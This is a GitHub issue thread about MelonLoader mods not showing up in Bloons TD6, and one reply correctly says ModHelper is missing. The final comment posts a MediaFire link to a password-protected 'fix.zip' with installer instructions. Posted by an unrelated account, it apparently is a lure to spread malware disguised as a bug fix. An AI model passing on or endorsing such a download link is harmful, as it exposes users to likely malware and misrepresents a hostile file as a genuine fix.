### ISSUE TITLE
[Bug]: Btd6 starts but i cant see the Melon loader

### ISSUE THREAD

**Issue by Zelleonix** [LavaGang/MelonLoader#728]
### All of the following criteria must be met

- [X] All <a href="https://github.com/LavaGang/MelonLoader/blob/master/README.md#requirements">Requirements</a> must be installed.
- [X] Changed the title so that it doesn't just says "[Bug]: "
- [X] I have searched the GitHub issues for my bug, even in the closed issues.

### All of the following are optional to answer

- [ ] Tried reinstalling the Game.
- [ ] Tried reinstalling MelonLoader.
- [X] Tried restarting PC.
- [X] Was able to see the Start Screen.

### Describe the issue.

if i start Btd6 with Melon loader everithing works perfectly but in the game i cant access or the mods the mod menu just doesnt show up 
[Latest.log](https://github.com/user-attachments/files/16783912/Latest.log)

### Did you attach your log file?

Yes, I attached my log file to the text box above.

**Comment by KibblesTheKitten** [comment]
You don't have modhelper in the mods folder. Download it from it's GitHub repo and put the downloaded .DLL file into the mods folder

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
